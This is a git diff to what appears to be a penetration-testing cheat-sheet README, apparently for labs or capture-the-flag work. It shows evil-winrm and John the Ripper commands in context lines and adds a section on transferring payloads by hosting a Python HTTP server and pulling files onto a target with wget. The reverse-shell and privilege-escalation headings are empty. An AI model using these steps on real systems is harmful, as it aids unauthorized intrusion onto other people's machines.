diff --git a/README.md b/README.md
index 4273e4f..6aa761c 100644
--- a/README.md
+++ b/README.md
@@ -269,19 +269,6 @@ evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
-
-# Reverse Shell
-
-## Linux
-
-## Windows
-
-# Privilege Escalation
-
-## Linux
-
-## Windows
-
# Password Cracking
***
@@ -309,3 +296,51 @@ john -w=/usr/share/wordlists/rockyou.txt {file.txt}
+# Payload File Transfer
+
+...
+
+## 1) Python Server
+
+
+
+**USAGE**
+
+
+
+```bash
+# Host a personal server on a specific port
+sudo python3 -m http.server {PORT}
+```
+## 2) WGET
+
+
+
+**USAGE**
+
+
+
+```bash
+# Download files on the remote machine
+wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
+
+# {IP ADDRESS}: Python Server IP Address
+# {FILE}: The payload to be trasnfered
+```
+
+
+# Privilege Escalation
+
+## Linux
+
+## Windows
+
+
+# Reverse Shell
+
+## Linux
+
+## Windows
+
+
+